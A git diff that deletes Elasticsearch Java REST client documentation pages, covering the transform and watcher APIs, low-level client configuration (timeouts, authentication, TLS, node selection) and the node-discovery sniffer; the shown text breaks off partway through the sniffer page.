a/docs/java-rest/high-level/transform/stop_transform.asciidoc b/docs/java-rest/high-level/transform/stop_transform.asciidoc deleted file mode 100644 index ce49434318d..00000000000 --- a/docs/java-rest/high-level/transform/stop_transform.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: stop-transform -:request: StopTransformRequest -:response: StopTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop {transform} API - -Stops a started {transform}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Stop {transform} request - -A +{request}+ object requires a non-null `id`. `id` can be a comma separated -list of IDs or a single ID. Wildcards, `*` and `_all` are also accepted. - - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new stop request referencing an existing {transform}. - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> If true wait for the {transform} task to stop before responding. -<2> Controls the amount of time to wait until the {transform} stops. -<3> Whether to ignore if a wildcard expression matches no {transforms}. - -include::../execution.asciidoc[] - -==== Response - -The returned +{response}+ object acknowledges the {transform} has stopped. diff --git a/docs/java-rest/high-level/transform/update_transform.asciidoc b/docs/java-rest/high-level/transform/update_transform.asciidoc deleted file mode 100644 index ffde48ae186..00000000000 --- a/docs/java-rest/high-level/transform/update_transform.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ --- -:api: update-transform -:request: UpdateTransformRequest -:response: UpdateTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update {transform} API - -Updates an existing {transform}. - -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Update {transform} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The update configuration with which to update the {transform}. -<2> The ID of the configuration to update. -<3> Whether or not to wait to run deferrable validations until `_start` is called. -This option should be used with care as the created {transform} will run -with the privileges of the user creating it. Meaning, if they do not have privileges, -such an error will not be visible until `_start` is called. - -[id="{upid}-{api}-config"] -==== {transform-cap} update configuration - -The `TransformConfigUpdate` object contains all the details about updated -{transform} configuration and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The source indices and query from which to gather data. -<2> The destination index and optional pipeline. -<3> How often to check for updates to the source indices. -<4> How to keep the {transform} in sync with incoming data. -<5> Optional free text description of the {transform}. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the updated {transform} configuration -or an error if the update failed or is invalid. diff --git a/docs/java-rest/high-level/watcher/ack-watch.asciidoc b/docs/java-rest/high-level/watcher/ack-watch.asciidoc deleted file mode 100644 index 7dfc3faad8e..00000000000 --- a/docs/java-rest/high-level/watcher/ack-watch.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: ack-watch -:request: AckWatchRequest -:response: AckWatchResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Ack watch API - -[id="{upid}-{api}-request"] -==== Execution - -{ref}/actions.html#actions-ack-throttle[Acknowledging a watch] enables you -to manually throttle execution of a watch's actions. A watch can be acknowledged -through the following request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the watch to ack. -<2> An optional list of IDs representing the watch actions that should be acked. -If no action IDs are provided, then all of the watch's actions will be acked. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the new status of the requested watch: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The status of a specific action that was acked. -<2> The acknowledgement state of the action. If the action was successfully -acked, this state will be equal to `AckStatus.State.ACKED`. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/activate-watch.asciidoc b/docs/java-rest/high-level/watcher/activate-watch.asciidoc deleted file mode 100644 index 6cbe0344e34..00000000000 --- a/docs/java-rest/high-level/watcher/activate-watch.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: activate-watch -:request: ActivateWatchRequest -:response: ActivateWatchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Activate watch API - -[id="{upid}-{api}-request"] -==== Execution - -A watch can be activated as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the new status of the activated watch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `watchStatus` contains status of the watch - -[id="{upid}-{api}-request-async"] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/watcher/deactivate-watch.asciidoc b/docs/java-rest/high-level/watcher/deactivate-watch.asciidoc deleted file mode 100644 index 3594fda984e..00000000000 --- a/docs/java-rest/high-level/watcher/deactivate-watch.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ --- -:api: deactivate-watch -:request: deactivateWatchRequest -:response: deactivateWatchResponse -:doc-tests-file: {doc-tests}/WatcherDocumentationIT.java --- -[role="xpack"] -[[java-rest-high-watcher-deactivate-watch]] -=== Deactivate watch API - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/delete-watch.asciidoc b/docs/java-rest/high-level/watcher/delete-watch.asciidoc deleted file mode 100644 index 9e438bb16b5..00000000000 --- a/docs/java-rest/high-level/watcher/delete-watch.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-watcher-delete-watch]] -=== Delete watch API - -[[java-rest-high-x-pack-watcher-delete-watch-execution]] -==== Execution - -A watch can be deleted as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-delete-watch-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-watcher-delete-watch-response]] -==== Response - -The returned `DeleteWatchResponse` contains `found`, `id`, -and `version` information. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-response] --------------------------------------------------- -<1> `_id` contains id of the watch -<2> `found` is a boolean indicating whether the watch was found -<3> `_version` returns the version of the deleted watch - -[[java-rest-high-x-pack-watcher-delete-watch-async]] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-delete-watch-execute-async] --------------------------------------------------- -<1> The `DeleteWatchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteWatchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-delete-watch-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/watcher/execute-watch.asciidoc b/docs/java-rest/high-level/watcher/execute-watch.asciidoc deleted file mode 100644 index b23b0918589..00000000000 --- a/docs/java-rest/high-level/watcher/execute-watch.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ --- -:api: execute-watch -:request: ExecuteWatchRequest -:response: ExecuteWatchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Execute watch API - -The execute watch API allows clients to immediately execute a watch, either -one that has been previously added via the -{ref}/watcher-api-put-watch.html[Put Watch API] or inline as part of the request. - -[id="{upid}-{api}-request-by-id"] -==== Execute by id - -Submit the following request to execute a previously added watch: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id] ---------------------------------------------------- -<1> Alternative input for the watch to use in json format -<2> Set the mode for action "action1" to SIMULATE -<3> Record this execution in watcher history -<4> Execute the watch regardless of the watch's condition -<5> Set the trigger data for the watch in json format -<6> Enable debug mode - -[id="{upid}-{api}-response-by-id"] -==== Execute by id response - -The returned `Response` contains details of the execution: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id-response] ---------------------------------------------------- -<1> The record ID for this execution -<2> The execution response as a java `Map` -<3> Extract information from the response map using `ObjectPath` - -[id="{upid}-{api}-response-by-id-async"] -==== Asynchronous execution by id - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id-execute-async] --------------------------------------------------- -<1> The `ExecuteWatchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `ExecuteWatchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - - -[id="{upid}-{api}-request-inline"] -==== Execute inline - -Submit the following request to execute a watch defined as part of the request: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-inline] ---------------------------------------------------- -<1> Alternative input for the watch to use in json format -<2> Set the mode for action "action1" to SIMULATE -<3> Execute the watch regardless of the watch's condition -<4> Set the trigger data for the watch in json format -<5> Enable debug mode - -Note that inline watches cannot be recorded. - -The response format and asynchronous execution methods are the same as for the -Execute Watch by ID API. \ No newline at end of file diff --git a/docs/java-rest/high-level/watcher/get-watch.asciidoc b/docs/java-rest/high-level/watcher/get-watch.asciidoc deleted file mode 100644 index 540f64ca947..00000000000 --- a/docs/java-rest/high-level/watcher/get-watch.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: get-watch -:request: GetWatchRequest -:response: GetWatchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get watch API - -[id="{upid}-{api}-request"] -==== Execution - -A watch can be retrieved as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains `id`, `version`, `status` and `source` -information. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `_id`, id of the watch -<2> `found` is a boolean indicating whether the watch was found -<3> `_version` returns the version of the watch -<4> `status` contains status of the watch -<5> `source` the source of the watch - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/watcher/put-watch.asciidoc b/docs/java-rest/high-level/watcher/put-watch.asciidoc deleted file mode 100644 index f3ab52181f2..00000000000 --- a/docs/java-rest/high-level/watcher/put-watch.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-watcher-put-watch]] -=== Put watch API - -[[java-rest-high-x-pack-watcher-put-watch-execution]] -==== Execution - -General information about the installed {watcher} features can be retrieved -using the `watcher()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-execute] --------------------------------------------------- -<1> Allows to store the watch, but to not trigger it. Defaults to `true` - -[[java-rest-high-x-pack-watcher-put-watch-response]] -==== Response - -The returned `PutWatchResponse` contains `created`, `id`, -and `version` information. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-response] --------------------------------------------------- -<1> `_id` contains id of the watch -<2> `created` is a boolean indicating whether the watch was created for the first time -<3> `_version` returns the newly created version - -[[java-rest-high-x-pack-watcher-put-watch-async]] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-execute-async] --------------------------------------------------- -<1> The `PutWatchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutWatchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/watcher/start-watch-service.asciidoc b/docs/java-rest/high-level/watcher/start-watch-service.asciidoc deleted file mode 100644 index 02b439e0c6a..00000000000 --- a/docs/java-rest/high-level/watcher/start-watch-service.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: start-watch-service -:request: StartWatchServiceRequest -:response: StartWatchServiceResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start watch service API - -[id="{upid}-{api}-request"] -==== Execution - -{ref}/watcher-api-start.html[Start watcher] enables you -to manually start the watch service. Submit the following request -to start the watch service: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned `AcknowledgedResponse` contains a value on whether or not the request -was received: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A boolean value of `true` if successfully received, `false` otherwise. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/stop-watch-service.asciidoc b/docs/java-rest/high-level/watcher/stop-watch-service.asciidoc deleted file mode 100644 index 9eeca6b2236..00000000000 --- a/docs/java-rest/high-level/watcher/stop-watch-service.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: stop-watch-service -:request: StopWatchServiceRequest -:response: StopWatchServiceResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop watch service API - -[[java-rest-high-watcher-stop-watch-service-execution]] -==== Execution - -{ref}/watcher-api-stop.html[Stop watcher] enables you -to manually stop the watch service. Submit the following request -to stop the watch service: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[[java-rest-high-watcher-stop-watch-service-response]] -==== Response - -The returned `AcknowledgeResponse` contains a value on whether or not the request -was received: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A boolean value of `true` if successfully received, `false` otherwise. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/watcher-stats.asciidoc b/docs/java-rest/high-level/watcher/watcher-stats.asciidoc deleted file mode 100644 index d0e1837c26c..00000000000 --- a/docs/java-rest/high-level/watcher/watcher-stats.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: watcher-stats -:request: WatcherStatsRequest -:response: WatcherStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Watcher stats API - -[id="{upid}-{api}-request"] -==== Execution - -{ref}/watcher-api-stats.html[Watcher Stats] returns the current {watcher} metrics. -Submit the following request to get the stats: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned `AcknowledgeResponse` contains a value on whether or not the request -was received: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A boolean value of `true` if successfully received, `false` otherwise. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/index.asciidoc b/docs/java-rest/index.asciidoc deleted file mode 100644 index 212d34f663d..00000000000 --- a/docs/java-rest/index.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-rest]] -= Java REST Client - -include::../Versions.asciidoc[] - -include::overview.asciidoc[] - -include::low-level/index.asciidoc[] - -include::high-level/index.asciidoc[] - -include::redirects.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/license.asciidoc b/docs/java-rest/license.asciidoc deleted file mode 100644 index 2ec3d151974..00000000000 --- a/docs/java-rest/license.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -== License - -Copyright 2013-2019 Elasticsearch - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. - diff --git a/docs/java-rest/low-level/configuration.asciidoc b/docs/java-rest/low-level/configuration.asciidoc deleted file mode 100644 index d368d8362f0..00000000000 --- a/docs/java-rest/low-level/configuration.asciidoc +++ /dev/null @@ -1,189 +0,0 @@ -[[java-rest-low-config]] -== Common configuration - -As explained in <>, the `RestClientBuilder` -supports providing both a `RequestConfigCallback` and an `HttpClientConfigCallback` -which allow for any customization that the Apache Async Http Client exposes. -Those callbacks make it possible to modify some specific behaviour of the client -without overriding every other default configuration that the `RestClient` -is initialized with. This section describes some common scenarios that require -additional configuration for the low-level Java REST Client. - -=== Timeouts - -Configuring requests timeouts can be done by providing an instance of -`RequestConfigCallback` while building the `RestClient` through its builder. -The interface has one method that receives an instance of -https://hc.apache.org/httpcomponents-client-ga/httpclient/apidocs/org/apache/http/client/config/RequestConfig.Builder.html[`org.apache.http.client.config.RequestConfig.Builder`] - as an argument and has the same return type. The request config builder can -be modified and then returned. In the following example we increase the -connect timeout (defaults to 1 second) and the socket timeout (defaults to 30 -seconds). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-timeouts] --------------------------------------------------- - -Timeouts also can be set per request with RequestOptions, which overrides RestClient customizeRequestConfig. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-request-options-timeouts] --------------------------------------------------- - -=== Number of threads - -The Apache Http Async Client starts by default one dispatcher thread, and a -number of worker threads used by the connection manager, as many as the number -of locally detected processors (depending on what -`Runtime.getRuntime().availableProcessors()` returns). The number of threads -can be modified as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-threads] --------------------------------------------------- - -=== Basic authentication - -Configuring basic authentication can be done by providing an -`HttpClientConfigCallback` while building the `RestClient` through its builder. -The interface has one method that receives an instance of -https://hc.apache.org/httpcomponents-asyncclient-dev/httpasyncclient/apidocs/org/apache/http/impl/nio/client/HttpAsyncClientBuilder.html[`org.apache.http.impl.nio.client.HttpAsyncClientBuilder`] - as an argument and has the same return type. The http client builder can be -modified and then returned. In the following example we set a default -credentials provider that requires basic authentication. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-basic-auth] --------------------------------------------------- - -Preemptive Authentication can be disabled, which means that every request will be sent without -authorization headers to see if it is accepted and, upon receiving an HTTP 401 response, it will -resend the exact same request with the basic authentication header. If you wish to do this, then -you can do so by disabling it via the `HttpAsyncClientBuilder`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-disable-preemptive-auth] --------------------------------------------------- -<1> Disable preemptive authentication - -=== Other authentication methods - -==== Elasticsearch Token Service tokens - -If you want the client to authenticate with an Elasticsearch access token, set the relevant HTTP request header. -If the client makes requests on behalf of a single user only, you can set the necessary `Authorization` header as a default header as shown -in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-auth-bearer-token] --------------------------------------------------- - -==== Elasticsearch API keys - -If you want the client to authenticate with an Elasticsearch API key, set the relevant HTTP request header. -If the client makes requests on behalf of a single user only, you can set the necessary `Authorization` header as a default header as shown -in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-auth-api-key] --------------------------------------------------- - -=== Encrypted communication - -Encrypted communication using TLS can also be configured through the -`HttpClientConfigCallback`. The -https://hc.apache.org/httpcomponents-asyncclient-dev/httpasyncclient/apidocs/org/apache/http/impl/nio/client/HttpAsyncClientBuilder.html[`org.apache.http.impl.nio.client.HttpAsyncClientBuilder`] - received as an argument exposes multiple methods to configure encrypted - communication: `setSSLContext`, `setSSLSessionStrategy` and - `setConnectionManager`, in order of precedence from the least important. - -When accessing an Elasticsearch cluster that is setup for TLS on the HTTP layer, the client needs to trust the certificate that -Elasticsearch is using. - The following is an example of setting up the client to trust the CA that has signed the certificate that Elasticsearch is using, when - that CA certificate is available in a PKCS#12 keystore: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-encrypted-communication] --------------------------------------------------- - -The following is an example of setting up the client to trust the CA that has signed the certificate that Elasticsearch is using, when -that CA certificate is available as a PEM encoded file. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-trust-ca-pem] --------------------------------------------------- - -When Elasticsearch is configured to require client TLS authentication, for example when a PKI realm is configured, the client needs to provide -a client certificate during the TLS handshake in order to authenticate. The following is an example of setting up the client for TLS -authentication with a certificate and a private key that are stored in a PKCS#12 keystore. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-mutual-tls-authentication] --------------------------------------------------- - -If the client certificate and key are not available in a keystore but rather as PEM encoded files, you cannot use them -directly to build an SSLContext. You must rely on external libraries to parse the PEM key into a PrivateKey instance. Alternatively, you -can use external tools to build a keystore from your PEM files, as shown in the following example: - -``` -openssl pkcs12 -export -in client.crt -inkey private_key.pem \ - -name "client" -out client.p12 -``` - -If no explicit configuration is provided, the https://docs.oracle.com/javase/7/docs/technotes/guides/security/jsse/JSSERefGuide.html#CustomizingStores[system default configuration] -will be used. - -=== Others - -For any other required configuration needed, the Apache HttpAsyncClient docs -should be consulted: https://hc.apache.org/httpcomponents-asyncclient-4.1.x/ . - -NOTE: If your application runs under the security manager you might be subject -to the JVM default policies of caching positive hostname resolutions -indefinitely and negative hostname resolutions for ten seconds. If the resolved -addresses of the hosts to which you are connecting the client to vary with time -then you might want to modify the default JVM behavior. These can be modified by -adding -https://docs.oracle.com/javase/8/docs/technotes/guides/net/properties.html[`networkaddress.cache.ttl=`] -and -https://docs.oracle.com/javase/8/docs/technotes/guides/net/properties.html[`networkaddress.cache.negative.ttl=`] -to your -https://docs.oracle.com/javase/8/docs/technotes/guides/security/PolicyFiles.html[Java -security policy]. - -=== Node selector - -The client sends each request to one of the configured nodes in round-robin -fashion. Nodes can optionally be filtered through a node selector that needs -to be provided when initializing the client. This is useful when sniffing is -enabled, in case only dedicated master nodes should be hit by HTTP requests. -For each request the client will run the eventually configured node selector -to filter the node candidates, then select the next one in the list out of the -remaining ones. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-allocation-aware-selector] --------------------------------------------------- -<1> Set an allocation aware node selector that allows to pick a node in the -local rack if any available, otherwise go to any other node in any rack. It -acts as a preference rather than a strict requirement, given that it goes to -another rack if none of the local nodes are available, rather than returning -no nodes in such case which would make the client forcibly revive a local node -whenever none of the nodes from the preferred rack is available. - -WARNING: Node selectors that do not consistently select the same set of nodes -will make round-robin behaviour unpredictable and possibly unfair. The -preference example above is fine as it reasons about availability of nodes -which already affects the predictability of round-robin. Node selection should -not depend on other external factors or round-robin will not work properly. diff --git a/docs/java-rest/low-level/index.asciidoc b/docs/java-rest/low-level/index.asciidoc deleted file mode 100644 index 9c7b4c0c55d..00000000000 --- a/docs/java-rest/low-level/index.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[java-rest-low]] -= Java Low Level REST Client - -[partintro] --- - -The low-level client's features include: - -* minimal dependencies - -* load balancing across all available nodes - -* failover in case of node failures and upon specific response codes - -* failed connection penalization (whether a failed node is retried depends on - how many consecutive times it failed; the more failed attempts the longer the - client will wait before trying that same node again) - -* persistent connections - -* trace logging of requests and responses - -* optional automatic <> - --- - -:doc-tests: {elasticsearch-root}/client/rest/src/test/java/org/elasticsearch/client/documentation -include::usage.asciidoc[] -include::configuration.asciidoc[] - -:doc-tests: {elasticsearch-root}/client/sniffer/src/test/java/org/elasticsearch/client/sniff/documentation -include::sniffer.asciidoc[] - -include::../license.asciidoc[] - -:doc-tests!: diff --git a/docs/java-rest/low-level/sniffer.asciidoc b/docs/java-rest/low-level/sniffer.asciidoc deleted file mode 100644 index 84f1510bae4..00000000000 --- a/docs/java-rest/low-level/sniffer.asciidoc +++ /dev/null @@ -1,136 +0,0 @@ -[[sniffer]] -== Sniffer - -Minimal library that allows to automatically discover nodes from a running -Elasticsearch cluster and set them to an existing `RestClient` instance. -It retrieves by default the nodes that belong to the cluster using the -Nodes Info api and uses jackson to parse the obtained json response. - -Compatible with Elasticsearch 2.x and onwards. - -[[java-rest-sniffer-javadoc]] -=== Javadoc - -The javadoc for the REST client sniffer can be found at {rest-client-sniffer-javadoc}/index.html. - -=== Maven Repository - -The REST client sniffer is subject to the same release cycle as -Elasticsearch. Replace the version with the desired sniffer version, first -released with `5.0.0-alpha4`. There is no relation between the sniffer version -and the Elasticsearch version that the client can communicate with. Sniffer -supports fetching the nodes list from Elasticsearch 2.x and onwards. - -If you are looking for a SNAPSHOT version, the Elastic Maven Snapshot repository is available -at https://snapshots.elastic.co/maven/. - -==== Maven configuration - -Here is how you can configure the dependency using maven as a dependency manager. -Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch.client - elasticsearch-rest-client-sniffer - {version} - --------------------------------------------------- - -==== Gradle configuration - -Here is how you can configure the dependency using gradle as a dependency manager. -Add the following to your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -dependencies { - compile 'org.elasticsearch.client:elasticsearch-rest-client-sniffer:{version}' -} --------------------------------------------------- - -=== Usage - -Once a `RestClient` instance has been created as shown in <>, -a `Sniffer` can be associated to it. The `Sniffer` will make use of the provided `RestClient` -to periodically (every 5 minutes by default) fetch the list of current nodes from the cluster -and update them by calling `RestClient#setNodes`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-init] --------------------------------------------------- - -It is important to close the `Sniffer` so that its background thread gets -properly shutdown and all of its resources are released. The `Sniffer` -object should have the same lifecycle as the `RestClient` and get closed -right before the client: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-close] --------------------------------------------------- - -The `Sniffer` updates the nodes by default every 5 minutes. This interval can -be customized by providing it (in milliseconds) as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-interval] --------------------------------------------------- - -It is also possible to enable sniffing on failure, meaning that after each -failure the nodes list gets updated straightaway rather than at the following -ordinary sniffing round. In this case a `SniffOnFailureListener` needs to -be created at first and provided at `RestClient` creation. Also once the -`Sniffer` is later created, it needs to be associated with that same -`SniffOnFailureListener` instance, which will be notified at each failure -and use the `Sniffer` to perform the additional sniffing round as described. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniff-on-failure] --------------------------------------------------- -<1> Set the failure listener to the `RestClient` instance -<2> When sniffing on failure, not only do the nodes get updated after each -failure, but an additional sniffing round is also scheduled sooner than usual, -by default one minute after the failure, assuming that things will go back to -normal and we want to detect that as soon as possible. Said interval can be -customized at `Sniffer` creation time through the `setSniffAfterFailureDelayMillis` -method. Note that this last configuration parameter has no effect in case sniffing -on failure is not enabled like explained above. -<3> Set the `Sniffer` instance to the failure listener - -The Elasticsearch Nodes Info api doesn't return the protocol to use when -connecting to the nodes but only their `host:port` key-pair, hence `http` -is used by default. In case `https` should be used instead, the -`ElasticsearchNodesSniffer` instance has to be manually created and provided -as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-https] 